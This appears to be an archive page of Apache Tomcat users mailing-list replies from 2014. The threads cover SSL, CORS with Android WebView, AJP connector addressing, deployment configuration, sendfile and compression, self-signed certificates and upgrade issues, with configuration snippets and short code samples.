I have setup tomcat 6 on SLES 11 and secured the instance with an external certificate if authority. The following is occurring from the same machine using both IE and Firefox:

http://servername.wooster.edu:8080 works for both IE11 and Firefox 29 and displays the index.html
https://servername.wooster.edu:8443 works for Firefox 29 and displays the index.html
https://servername.wooster.edu:8443 does not work for IE11v displays This page can't be displayed

I have changed the logging level to finest and do not see any errors in the catalina.out. Thoughts? I have the same setup on another server and I believe the files and permission levels are set the same.

What does your SSL configuration look like? You could also use either sslscan from the CLI or go to https://www.ssllabs.com/ssltest/ and use their online tool to examine the site from the outside. Perhaps you have a combination of protocols and ciphers that MSIE can't handle.

- -chris

If the option is available, you might also try disabling the IE friendly error messages. I'm not sure about IE 11, but it seems like previous versions displayed an error message with a reddish background if they were unable to authenticate a server with a given SSL certificate.

Was a certificate authority bundle supplied with the SSL certificate? If so, is it installed and configured? Were the SSL certificates on the both servers issued by the same company?

-Terence Bandoian

MG> IE / Internet Options / Tools / Content / Certificates / Import
MG> Import the provided certificate into CA Trusted Root
RE: CORS issue with Tomcat and Android Webview
Date: Sat, 26 Apr 2014 11:43:05 +0530
Subject: Re: CORS issue with Tomcat and Android Webview
From: ankising...@gmail.com
To: users@tomcat.apache.org

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian tere...@tmbsw.com wrote:

On 4/24/2014 11:16 PM, Ankit Singhal wrote:

Hi

I did more research on this and figured out the issue. If you see the headers from Android and look into Origin Header.

    Origin: file://

Tomcat CORS filter tries to validate the URI in Origin header and considers file:// as an invalid URI and returns back 403. I have applied <accept-origin>*</accept-origin> params. So shouldn't CORS filter honor this ? I agree that Client also has the problem , but still server should also allow...

Hi, Ankit-

Have you tried disabling or removing the CORS filter when you're testing from the Android device? The flowchart in the Tomcat CORS documentation indicates that the filter will attempt to validate the origin before it determines whether or not it is allowed. Apparently, the file scheme is not considered valid.

MG> referencing the request processing flowchart at
MG> https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png
MG> you will need to carefully shepherd your request thru TC Valve/Filter/ServletProcessing gauntlet
MG> did you supply a valid origin header?
MG> http://en.wikipedia.org/wiki/List_of_HTTP_header_fields
MG> did you supply a valid request method e.g. POST/GET?
MG> Android is a much different User-agent than Browser and you will need to set the request headers properly

    HttpConnection httpConn = null;
    try {
        // Open an HTTP Connection object
        httpConn = (HttpConnection) Connector.open("http://LOCALHOST:8080/services/getdata");
        // Setup HTTP Request to POST
        httpConn.setRequestMethod(HttpConnection.POST);
        httpConn.setRequestProperty("User-Agent", "???");
    } catch (IOException e) {
        // opening the connection or setting up the request failed
    }

MG> http://www.useragentstring.com/pages/Mobile%20Browserlist/

Hope that helps.

-Terence Bandoian

On Fri, Apr 25, 2014 at 1:36 AM, Terence M. Bandoian tere...@tmbsw.com wrote:

On 4/24/2014 1:14 PM, Jose María Zaragoza wrote:

2014-04-24 19:00 GMT+02:00 Terence M. Bandoian tere...@tmbsw.com:

On 4/22/2014 1:37 PM, Jose María Zaragoza wrote:

-- Forwarded message --
From: Terence M. Bandoian tere...@tmbsw.com
Date: 2014-04-22 20:12 GMT+02:00
Subject: Re: CORS issue with Tomcat and Android Webview
To: Tomcat Users List users@tomcat.apache.org

On 4/22/2014 11:03 AM, Ankit Singhal wrote:

Also we tried to give the same call from Android App to some different Node server and things worked fine. So it seems some problem with Tomcat only.

A silly question: What does it have to do Tomcat's CORS support with W3C Widget Access specification ? I have no idea about Phonegap but it looks like that it prefers to follow that specification for managing requests to different domains , right ?

Hi, Jose-

The request/response headers in the original post were difficult for me to follow but basically, requests to Tomcat are successful when tested with Chrome (desktop? laptop? server? same as Tomcat?) and unsuccessful when tested from an Android device. What are the differences between the two environments? Do those differences have any effect on request processing by the Tomcat CORS filter? If it were me, I'd find out.

Well , I have no idea, but according this page http://www.html5rocks.com/en/tutorials/cors/ if Content-Type is application/json , then request is a not simple request ( sic. ) and it requires a OPTIONS preflight request ( including Origin header) And Once the preflight request gives permissions, the browser makes the actual request

First case (Chrome browser) did but, but the second didn't

Are you test to change the Content-Type ?

Regards

Hi, Jose-

From the page you cited:

The use-case for CORS is simple. Imagine the site alice.com has some data that the site bob.com wants to access. This type of request traditionally wouldn’t be allowed under the browser’s same origin policy. However, by supporting CORS requests, alice.com can add a few special response headers that allows bob.com to access the data.

In this case, alice.com would be the server that hosts Tomcat. As you suggest, the problem may very well be in the client but - FOR ME - it's worth the effort to understand what should happen on both the client and the server and to ensure that both are configured correctly.

-Terence Bandoian

On Tue, Apr 22, 2014 at 9:22 PM, Ankit Singhal ankising...@gmail.com wrote:

Hi All

I am facing a strange problem with Tomcat 8 and CORS. I am developing a Hybrid web app using ionicframework, AngularJS, Cordova as front end and Tomcat 8 and Spring 3 as back-end. For easy development I am testing the
RE: CORS issue with Tomcat and Android Webview
From: demablo...@gmail.com
Date: Sat, 26 Apr 2014 13:56:43 +0200
Subject: Re: CORS issue with Tomcat and Android Webview
To: users@tomcat.apache.org

2014-04-26 13:16 GMT+02:00 Martin Gainty mgai...@hotmail.com:

Date: Sat, 26 Apr 2014 11:43:05 +0530
Subject: Re: CORS issue with Tomcat and Android Webview
From: ankising...@gmail.com
To: users@tomcat.apache.org

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian tere...@tmbsw.com wrote:

On 4/24/2014 11:16 PM, Ankit Singhal wrote:

Hi

I did more research on this and figure out the issue. If you see the headers from Android and look into Origin Header.

Origin: file://

Tomcat CORS filter tries to validate the URI in Origin header and considers file:// as an invalid URI and returns back 403. I have applied accept-origin*/accept-origin params. So shouldn't CORS filter honor this? I agree that Client also has the problem, but still server should also allow...

Hi:

I'm watching this flowchart

https://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png

and I wonder if Tomcat 7 checks if the request received belongs to the right type. I mean, if browser sends a simple request (eg. POST + application/xml content-type header) W3C spec says that request should be a preflight request, does Tomcat check this case?

MG you will need to set the Access-Allow-Origin to * and Content-Type to application/xml

    public void doPost(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        resp.addHeader("Access-Control-Allow-Origin", "*");
        resp.addHeader("Content-Type", "application/xml");
        // csvString: the response body, defined elsewhere in the servlet
        resp.getWriter().append(csvString);
    }
MG

Regards

- To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
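The order of checks discussed in this thread (the Origin header is validated as a URI first, and only then compared with the allowed origins), as an added example that is not Tomcat's CorsFilter source and not code from any poster. The class and method names, the 200/403 mapping and the sample origins other than file:// are assumptions made for the illustration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

/**
 * Added illustration (hypothetical class, not Tomcat code): a two-step
 * origin decision in which syntax validation runs before the allow-list.
 */
public class OriginCheckOrder {

    enum Decision { ALLOWED, REJECTED_INVALID_ORIGIN, REJECTED_NOT_ALLOWED }

    /**
     * Assumption: an origin counts as valid when java.net.URI can parse it
     * and it carries a scheme. "file://" fails to parse because the parser
     * expects an authority after the "//".
     */
    static boolean isParsableOrigin(String origin) {
        if (origin == null || origin.isEmpty()) {
            return false;
        }
        try {
            return new URI(origin).getScheme() != null;
        } catch (URISyntaxException e) {
            return false;
        }
    }

    /** Step 1: syntax. Step 2: allow-list. A wildcard is only seen in step 2. */
    static Decision decide(String origin, Set<String> allowedOrigins) {
        if (!isParsableOrigin(origin)) {
            return Decision.REJECTED_INVALID_ORIGIN;
        }
        if (allowedOrigins.contains("*") || allowedOrigins.contains(origin)) {
            return Decision.ALLOWED;
        }
        return Decision.REJECTED_NOT_ALLOWED;
    }

    /** Simplified mapping for the illustration: anything not allowed is a 403. */
    static int httpStatus(Decision decision) {
        return decision == Decision.ALLOWED ? 200 : 403;
    }

    public static void main(String[] args) {
        // Constructed sample configurations: "allow any origin" and a single origin.
        Set<String> anyOrigin = Collections.singleton("*");
        Set<String> oneOrigin = new HashSet<String>(Arrays.asList("http://localhost:8100"));

        // "file://" is the value reported in the thread; the others are constructed.
        String[] origins = { "file://", "http://localhost:8100", "http://example.org" };

        for (String origin : origins) {
            Decision open = decide(origin, anyOrigin);
            Decision strict = decide(origin, oneOrigin);
            System.out.printf("Origin: %-22s allow *: %s (%d)  allow one: %s (%d)%n",
                    origin, open, httpStatus(open), strict, httpStatus(strict));
        }
    }
}
```

Running it shows why a wildcard in the allowed origins does not change the outcome for a value that fails the first step: the allow-list is never consulted for it.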
RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
Date: Sat, 5 Apr 2014 06:57:23 -0400
From: dcker...@verizon.net
To: users@tomcat.apache.org
Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

... but if the server is a *nix implementation, the better diag tool might be dig.

And yes, I would not expect the address 0.0.0.0 on a client to connect to the localhost. That is a special case address meaning local network. If anything, it would be sending packets out the NIC card, not via loopback.

0.0.0.0 means all IPv4 interfaces available and only applies for binding a server socket. You can never connect to 0.0.0.0 as a client.

Chris - It actually has a different meaning based on use. For binding to a socket in the local IP stack, it means what you say. In the routing table, it means the default route. In firewalls/routers, it probably means something completely different. When used as a destination address, it means what I said. How the IP stack/hardware deals with it is dependent on the implementation. The RFCs specify that it should be treated the same as the broadcast address, but local network only, and not routable. That may be for received packets only, as I've seen other references that it should never be used on-the-wire, unless as the source address in protocols like DHCP. In any event, definitely not expect the 0.0.0.0. address to get any response, either local host or otherwise.

For the OP's specific problem, s/he need to see how localhost is resolving. Most systems define it in the local hosts file, either /etc/hosts (*nix) or c:\Windows\system32\etc\hosts. Not sure for other systems.

Jeff

Make that C:\Windows\system32\drivers\etc\hosts. I did a test and it appeared that ping didn't rely on the entry being there, but it could have been a cached result.

Way back in the day when I had the misfortune to use Windows regularly for stuff like this, I seem to recall that almost nothing short of a reboot would cause the hosts file to be re-read.

- -chris

If I remember correctly, the Windows resolver cache may be cleared from a command prompt with ipconfig and that should include entries from the hosts file. Seems like I may have had to restart the browser though to see any changes to the hosts file.

    ipconfig /flushdns

MG ipconfig/flushdns *should* flush the ips and the dns entries
MG to test use a browser that doesn't cache dns entries (like firefox)
MG go to address bar about:config network.dnsCacheExpirationGracePeriod
MG http://kb.mozillazine.org/Network.dnsCacheExpiration
MG hth, Martin
MG
RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
From: jeffrey.jan...@polydyne.com
To: users@tomcat.apache.org
Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work
Date: Fri, 4 Apr 2014 17:33:08 +

-Original Message-
From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
Sent: Friday, April 04, 2014 12:10 PM
To: 'Tomcat Users List'
Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

-Original Message-
From: Jeffrey Janner [mailto:jeffrey.jan...@polydyne.com]
Sent: Friday, April 04, 2014 12:04 PM
To: 'Tomcat Users List'
Subject: RE: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

-Original Message-
From: Christopher Schultz [mailto:ch...@christopherschultz.net]
Sent: Friday, April 04, 2014 10:23 AM
To: Tomcat Users List
Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Jeffrey,

On 4/4/14, 10:50 AM, Jeffrey Janner wrote:

-Original Message-
From: André Warnier [mailto:aw@ice-sa.com]
Sent: Thursday, April 03, 2014 5:27 PM
To: Tomcat Users List
Subject: Re: AW: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

Christopher Schultz wrote:

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256

André,

On 4/3/14, 3:34 PM, André Warnier wrote:

Alten, Jessica-Aileen wrote:

-Original Message-
From: André Warnier [mailto:a...@ice-sa.com]
Sent: Thursday, 3 April 2014 15:36
To: Tomcat Users List
Subject: Re: AW: tomcat-connectors-1.2.39-windows-x86_64-iis does not work

Alten, Jessica-Aileen wrote:

A bit guessing here:

You have:

    worker.ajp13w.host=localhost

and

    jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed (errno=49)

is localhost == 0.0.0.0? From the point of view of mod_jk/isapi, should it not be 127.0.0.1?

Your answer points to the right direction. 0.0.0.0 means: any configured IPv4-Address on this computer, see

http://serverfault.com/questions/78048/whats-the-difference-between-ip-address-0-0-0-0-and-127-0-0-1

In principle this is ok at first. The Ajp13 Connector was configured in server.xml to listen at any IPv4 address on port 8009 - which is the default setting. But the connector can't find any suitable address.

The problem is: The new Tomcat-Connector can't parse worker.ajp13w.host=localhost, instead localhost must be replaced with 127.0.0.1, this works! In my eyes this is a big fat bug, because most documentation on workers use localhost. localhost is actually the default for the host connection directive. The new worker directive prefer_ipv6 doesn't change this behavior.

Hi.

Can you please really check this? Open a command window on that server, and do ping localhost. It should tell you what it understands by localhost. Copy and paste the result here:

    ping localhost
    Ping wird ausgeführt für xyz.uv.local [127.0.0.1] mit 32 Bytes Daten:
    Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128
    Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128
    Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128
    Antwort von 127.0.0.1: Bytes=32 Zeit1ms TTL=128
    Ping-Statistik für 127.0.0.1:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust),
    Ca. Zeitangaben in Millisek.:
    Minimum = 0ms, Maximum = 0ms, Mittelwert = 0ms

That /is/ bizarre.

As far as I know, to resolve hostnames in its configuration, mod_jk/isapi is using the OS's resolver library, the same as the one ping should be using.

On the other hand, you say that if you have worker.ajp13w.host=localhost it doesn't work (mod_jk cannot connect to tomcat), but when you change this to worker.ajp13w.host=127.0.0.1 then it works fine.

Ok, another check in a command window (and I assume that you open this command window *on the server itself* where mod_jk and Tomcat are running, right?)

test:
1) telnet localhost 8009
2) telnet 127.0.0.1 8009

Any difference between these 2 cases?

If not, then indeed it looks like a mod_jk/isapi_redirect 1.2.39 problem. In any case, you cannot connect to 0.0.0.0, as this log line would suggest:

    jk_open_socket::jk_connect.c (735): connect to 0.0.0.0:8009 failed

Could this be an interaction between IPv4 and IPv6? Try:

    C: nslookup localhost

You might get only 127.0.0.1 or you might also get :: (or something equivalent).
RE: How to deploy Java application into Tomcat in Linux
From: randhir.si...@sterlite.com
Date: Tue, 1 Apr 2014 10:43:28 +0530
Subject: How to deploy Java application into Tomcat in Linux
To: users@tomcat.apache.org

Hi,

As per my understanding, the steps to deploy a Java application on Tomcat (5.X/6.X) in Linux would be as follows:

1) Install Tomcat on Linux

2) Add a host entry in $TOMCAT_HOME/conf with the syntax like-

    <Host name="xxx.co.in" debug="0" appBase="/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool" unpackWARs="false" autoDeploy="false">

MG Unfortunately that Host designation wont work.. try

    <Host name="www.tomcatexpert.com" appBase="webapps" unpackWARs="true" autoDeploy="false">
MG

    <Alias>reports.fion.co.in</Alias>
    <Context path="" docBase="/opt/setuponm/jakarta-tomcat-5.0.28/sterlite/reportstool" debug="0" reloadable="false" crossContext="false" />

The above code would assign the host name to access the URL, gives the location of the web application pointed out by appBase context path.

3) Start Tomcat.

Please let me know if the steps above are correct and also please let me know in detail if the steps are not correct.
RE: catalina-ant reload task doesn't work
$/CATALINA_HOME/conf/server.xml
autoDeploy=true
https://tomcat.apache.org/tomcat-6.0-doc/config/host.html
?
Martin

Date: Fri, 28 Mar 2014 18:21:42 -0700
Subject: catalina-ant reload task doesn't work
From: catph...@catphive.net
To: users@tomcat.apache.org

Using the tasks from the example ant script at: http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt

I can deploy and undeploy from ant. However, the reload task doesn't seem to do anything. I make changes to java and html files, run ant reload which triggers the reload task. Ant reports success. I browse to the site and my changes aren't reflected.

undeploy followed by deploy works.

Am I not understanding what reload is supposed to do, or is there a different task that makes more sense to use?
RE: NoClassDefFoundError using catalina ant deploy task
no bugs..just ...'undocumented features'
glad you found the solution!
Martin

Date: Fri, 28 Mar 2014 17:51:08 -0700
Subject: Re: NoClassDefFoundError using catalina ant deploy task
From: catph...@catphive.net
To: users@tomcat.apache.org

I investigated more and found the solution... It seems like a doc bug in that the tutorial doesn't tell you everything you need to do to get deploy to work.

tomcat-util.jar needs to be placed in ~/.ant/lib. The tutorial says to place catalina-ant.jar there, but doesn't mention tomcat-util.jar.

The user needs the manager-script role for deploy to succeed. The tutorial doesn't mention this.

Overall the appdev tutorial is pretty problematic because it doesn't really include a complete example and seems to have kind of random organization.

On Fri, Mar 28, 2014 at 4:41 PM, Brendan Miller catph...@catphive.net wrote:

I was going through the tomcat docs and trying to use the default build.xml file provided by the appdev tutorial to deploy my war to tomcat.

Example build.xml: http://tomcat.apache.org/tomcat-8.0-doc/appdev/build.xml.txt

However, when I use the deploy task I always get a java.lang.NoClassDefFoundError: org/apache/tomcat/util/codec/binary/Base64 error.

I've copied the relevant code here: https://gist.github.com/catphive/9845270

I've verified that tomcat-util.jar, which contains Base64.class, is on the path, compile.classpath, passed to taskdef.

I'm just trying to do a basic tomcat tutorial, and getting this deploy task to run is hanging me up. Any ideas what could be doing wrong? Are these deploy tasks broken somehow?

Brendan
RE: SSO
When you say Linux I assume you are implementing Red Hat Enterprise Linux SSO
https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/5/html/Deployment_Guide/sso-ov.html
Martin

Please do not alter or disrupt this email transmission...Thank You

From: yossi.br...@sap.com
To: users@tomcat.apache.org
Subject: SSO
Date: Sun, 23 Mar 2014 07:37:41 +

Hi to all ,

I am trying to install SSO on Linux machine with Tomcat in order to working with Jenkins without the needed to login, any idea ?

Thanks a lot ,
Yos
RE: help with setting up proxy
From: hardikvaish...@gmail.com
Date: Sat, 22 Mar 2014 22:32:11 -0400
Subject: Re: help with setting up proxy
To: users@tomcat.apache.org

Here is the example of what I am trying to do.

JBoss Webserver Private IP : 192.168.10.100
JBoss Webserver Public IP 172.x.x.x
Server connected to Jboss: 192.168.10.101 192.168.10.102

If I am on the Jboss machine I can access 192.168.10.101\abc\test.html
If I am outside the network it's not possible to access URL 192.168.10.101\abc\test.html

To solve the problem I have PAC file as a proxy for my browser which redirect all request for 192.168.10.101 address to apache httpd proxy server which sits inside the (192.168.x.x) network. Up to this point everything works OK. Request comes to Apache httpd server but it is not able to pass the url as is to 192.168.10.101\abc\test.html and return the response back to the client.

MG 192.168.10.101 is only known to the machines obtaining their IP from that DHCP router
MG The router dynamically assigns 192.168.x.x to that machine at that point in time
MG No machine outside that routers network would ever know about those dynamic IPs
MG This is a Network issue... please contact your Net Admin

thanks,
-Hardik

On Sat, Mar 22, 2014 at 2:04 PM, Hardik Vaishnav hardikvaish...@gmail.com wrote:

Sorry my bad. I am talking about Apache httpd server.

On Mar 22, 2014 12:29 PM, Hassan Schroeder hassan.schroe...@gmail.com wrote:

On Sat, Mar 22, 2014 at 9:18 AM, Hardik Vaishnav hardikvaish...@gmail.com wrote:

I am trying to configure Apache Tomcat as a proxy server. I hope I am not confusing everybody.

I think perhaps you are confusing yourself. Tomcat has no intrinsic proxy server capability to configure. Are you thinking of the Apache httpd server?

-- Hassan Schroeder hassan.schroe...@gmail.com http://about.me/hassanschroeder twitter: @hassan
RE: Effects of turning off sendFile in the NIO connector
Date: Sat, 22 Mar 2014 14:24:01 -0400
Subject: Effects of turning off sendFile in the NIO connector
From: tomcat.ran...@gmail.com
To: users@tomcat.apache.org

What effect would setting useSendfile=false have on a web application using the NIO connector?

I'm asking because I may want to use gzip compression in the connector. The docs state:

*There is a tradeoff between using compression (saving your bandwidth) and using the sendfile feature (saving your CPU cycles). If the connector supports the sendfile feature, e.g. the NIO connector, using sendfile will take precedence over compression. The symptoms will be that static files greater that 48 Kb will be sent uncompressed.*

It's trivial that adding compression uses CPU cycles, but does that imply that turning sendFile off even without enabling compression would increase CPU cycles?

It's worth mentioning that the site serves a large (8mg) SWF file. I believe that was one of the pluses of NIO/sendFile, that it was good with sending large files under heavy traffic?

MG when you enable sendfile support with request attr org.apache.tomcat.sendfile.support = true
MG You will need to set these 3 header attributes
    org.apache.tomcat.sendfile.filename: Canonical filename of the file which will be sent as a String
    org.apache.tomcat.sendfile.start: Start offset as a Long
    org.apache.tomcat.sendfile.end: End offset as a Long
MG https://tomcat.apache.org/tomcat-6.0-doc/aio.html
MG Compression:
MG set compression=on @ Connector
MG https://tomcat.apache.org/tomcat-7.0-doc/config/http.html
MG I did not read that TC cannot use sendfile with any compressed Stream?
MG can you show us the URL?
MG Thanks

We also only really need compression on XML data, the site has minimal HTML, SWF's don't really benefit from gzip and some binary data we send back and forth is already compressed. I could manually implement compression on XML at the application level and within the SWF, if turning off sendFile will have negative consequences.

Tomcat 7.0.42
RHEL6
~4T outbound traffic/day

Best,
John
RE: jax-ws and tomcat 7 with ssl
i assume they copied OptionalPrefixcacerts $JAVA_HOME\jre\lib\security?
make sure validation dates are correct for Certificate
a self-signed cert is designed to work on the machine where you created the cert only *CN*
to implement a cert that will work on FQDN with correct dates you will need a REAL cert from verisign / thawte / DigiCert

Fixing PKIX Errors:
http://www.mkyong.com/webservices/jax-ws/suncertpathbuilderexception-unable-to-find-valid-certification-path-to-requested-target/

Making Self-Signed Certs
http://torlanglo.wordpress.com/2008/05/03/how-to-create-a-ssl-certificate-with-custom-domain-name-for-use-in-iis7-web-sites/

Get your 'REAL CERTS' here
http://safire.net/support/verisign.html

Martin

Date: Tue, 18 Mar 2014 17:58:32 -0400
From: mariacristinasi...@sourcecable.net
To: users@tomcat.apache.org
Subject: jax-ws and tomcat 7 with ssl

Hi,

I developed a web service using jax-ws and configured Tomcat to support SSL connection. Here are my steps:

** Step 1 - Generate a self-signed server certificate

Use JDK 1.7 keytool:

    keytool -genkey -alias trackerdev -keypass changeit -storepass changeit -keystore D:\Tomcat7\htdkeystore\trackerdev.ks -ext san=ip:xx.x.x.xxx

    Is CN=xx.x.x.xxx, OU=it, O=companynamehere, L=citynamehere, ST=provincenamehere, C=ca correct?
    [no]: yes

** Step 2 - Configure Tomcat to support SSL connection

On the dev server: Modify TOMCAT_HOME\conf\server.xml by adding the following block where keystoreFile and keystorePass are set to values from the previous step:

    <Connector port="8444" protocol="HTTP/1.1" SSLEnabled="true"
               maxThreads="150" scheme="https" secure="true"
               clientAuth="false" sslProtocol="TLS"
               keystoreFile="htdkeystore/trackerdev.ks" keystorePass="changeit" />

** Step 3 - Export the generated server certificate to a certificate file

On the dev server:

    keytool -export -alias trackerdev -storepass changeit -file D:\Tomcat7\htdkeystore\serverdev.cer -keystore D:\Tomcat7\htdkeystore\trackerdev.ks

** Step 4 - Import the server certificate into the truststore file

(Open an administrator cmd window and hit Shift, Ctrl, Enter)

Copy serverdev.cer from the dev server and on the local machine:

    keytool -import -v -trustcacerts -alias trackerdev -file C:\fromdevserver\serverdev.cer -keystore "C:\Program Files\Java\jdk1.7.0_51\jre\lib\security\cacerts" -keypass changeit -storepass changeit

    Trust this certificate? [no]: yes

** Step 5 - Modify webapps's web.xml

Add the following:

    <listener>
        <listener-class>com.sun.xml.ws.transport.http.servlet.WSServletContextListener</listener-class>
    </listener>
    <servlet>
        <servlet-name>tracker</servlet-name>
        <servlet-class>com.sun.xml.ws.transport.http.servlet.WSServlet</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>tracker</servlet-name>
        <url-pattern>/tracker</url-pattern>
    </servlet-mapping>
    <security-constraint>
        <web-resource-collection>
            <web-resource-name>securedapp</web-resource-name>
            <url-pattern>/tracker</url-pattern>
        </web-resource-collection>
        <user-data-constraint>
            <transport-guarantee>CONFIDENTIAL</transport-guarantee>
        </user-data-constraint>
    </security-constraint>

** MY QUESTION IS THIS:

I tested the web service using https and it worked for me. I provided another team with my server certificate so that they could add it to their truststore file but I have no idea if they did or not. All I know is that they got an error loading the wsdl. The exception they got was:

    Error loading [https://xx.x.x.xxx:8444/appname/tracker?wsdl]
    org.apache.xmlbeans.XmlException: javax.net.ssl.SSLHandshakeException:
    sun.security.validator.ValidatorException: PKIX path building failed:
    sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target

They claim that the certificate is not properly signed. Well, I don't know. It is a self-signed certificate.

Any ideas would help!
RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
Seema-

You've asked about 10 different questions on 10 different aberrancies on your upgrade

zip up the whole project up and stick it on driveway or any other free site

That way anyone building/running the code on TC7.0.52 can at least observe same behaviour you are experiencing

Martin
--

From: seema...@hotmail.com
To: users@tomcat.apache.org
Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
Date: Tue, 18 Mar 2014 14:10:19 +

Any update on this Chris Schultz or anyone else? I know the images I added to the email didn't show up, so if you want me to email them directly to you, I can. Could really do with help on this, as it is not something I know much about.

Thanks
Seema

From: seema...@hotmail.com
To: users@tomcat.apache.org
Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
Date: Fri, 14 Mar 2014 15:15:04 +

Date: Fri, 14 Mar 2014 08:36:08 -0400
From: ch...@christopherschultz.net
To: users@tomcat.apache.org
Subject: Re: HttpServletRequest Tomcat 5.5.29 to 7.0.52

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Seema,

On 3/14/14, 7:53 AM, Seema Patel wrote:

I have upgraded my tomcat (5.5.29 to 7.0.52) and Java (1.5 to 1.7) for my struts servlet jsp application. I have also removed all JCIFS authentication from the WEB-INF/web.xml file and have tried to do BASIC authentication through Tomcat and the AD (it authenticates me, but not sure if I've missed anything out, as I've never done this before).

One question at a time, please ;)

Sorry for the off-loading of multiple questions :-)

I have a doFilter function in my code, which contains httpServletRequest.getServletPath() call. In the Tomcat 5.5.29 Java 1.5 version, this will work, as when I print httpServletRequest.getServletPath() i get the following:

    P1_00.do
    P5_0_0.do
    P5_0_1.do

But in Tomcat 7.0.52 Java 1.7 I get the following from httpServletRequest.getServletPath() call:

    P1_00.do
    P5_0_0.do
    P5_0_1.do
    includes/tab_defaultsettings.jsp
    includes/P1_00.do

How are you printing this? Do you just have a Filter that wraps everything and dumps-out the ServletPath for every request? Can you post the code for that Filter as well as the filter and filter-mapping configuration you have in web.xml?

I'm just doing a System.out.println() in the doFilter function in the RequestFilter class to show which page it is. The doFilter function is:

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        if (request instanceof HttpServletRequest) {
            final HttpServletRequest httpRequest = (HttpServletRequest) request;
            final Object userBeanObject = httpRequest.getSession().getAttribute(GenConstants.LOGGED_IN_USER_BEAN);
            final String pageName = httpRequest.getServletPath().replaceAll("/", "");
            System.out.println("Request Page = " + httpRequest.getServletPath());
            if (unsecuredPages.contains(pageName)) {
                // don't need any protection
                chain.doFilter(request, response);
            } else if (!(userBeanObject instanceof UserBean)) {
                // no user bean in session do need one, invalidate session and redirect to login
                if (httpRequest.getSession(false) != null) {
                    httpRequest.getSession().invalidate();
                }
                ((HttpServletResponse) response).sendRedirect(logonPage);
            } else {
                final UserBean user = (UserBean) userBeanObject;
                Map<String, LogicalOperation> permissions =
                        (Map<String, LogicalOperation>) context.getAttribute(GenConstants.PERMISSIONS_MAP);
                if (permissions == null) {
                    PermissionsUtil.setupPermissions(context);
                    permissions = (Map<String, LogicalOperation>) context.getAttribute(GenConstants.PERMISSIONS_MAP);
                }
                final LogicalOperation requiredOp = permissions.get(pageName.replaceAll("\\.do", ""));
                if (user.isOperationAllowed(requiredOp)) {
                    chain.doFilter(request, response);
                } else {
                    if (httpRequest.getSession(false) != null) {
                        httpRequest.getSession().invalidate();
                    }
                    ((HttpServletResponse) response).sendRedirect(logonPage);
                }
            }
        }
    }

To give you a better idea of what was in the web.xml, here is what's been taken out:

    <filter>
        <filter-name>NtlmHttpFilter</filter-name>
        <filter-class>jcifs.http.NtlmHttpFilter</filter-class>
        <init-param>
            <param-name>jcifs.smb.client.soTimeout</param-name>
            <param-value>3</param-value>
        </init-param>
        <!-- always needed for preauthentication / SMB signatures -->
        <init-param>
            <param-name>jcifs.smb.client.domain</param-name>
            <param-value>XXX.LOCAL</param-value>
        </init-param>
        <!-- SMB message signing requires a valid existing login -->
        <init-param>
            <param-name>jcifs.smb.client.username</param-name>
            <param-value>username</param-value>
        </init-param>
        <init-param>
            <param-name>jcifs.smb.client.password</param-name>
            <param-value>password</param-value>
        </init-param>
        <!-- Set the logging level -->
        <init-param>
RE: tomcat-native libraries
Date: Tue, 18 Mar 2014 19:57:57 +0530
Subject: Re: tomcat-native libraries
From: randeep...@gmail.com
To: users@tomcat.apache.org

On Tue, Mar 18, 2014 at 7:29 PM, Christopher Schultz ch...@christopherschultz.net wrote:

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Randeep,

On 3/18/14, 9:46 AM, Randeep wrote:

On Tue, Mar 18, 2014 at 7:13 PM, Christopher Schultz ch...@christopherschultz.net wrote:

John,

On 3/17/14, 9:52 AM, John Smith wrote:

Installing the native library will make a difference. Whether the difference is large enough to notice depends very much on your application. If you want to improve your application's performance I suspect your time would be better spent with a profiler to see where the bottlenecks are in your application.

Mark

+1 I had the native APR installed and ended up removing it in favor of keeping things simple. The NIO connector often recommended by Chris S. and others works very well.

It's also a bit safer in that obscure problems rarely bring-down the JVM, whereas a bug in tcnative/apr/openssl can kill the entire JVM without warning. Using APR really only makes sense if you are using Tomcat directly as a web server that uses SSL, since there is a measurable difference between OpenSSL's performance and JSSE's performance.

-chris

Thank you Chris,

In that case, I'm not going to use it. I was using httpd as front end to server ssl certificates. Now load balancer is handling it.

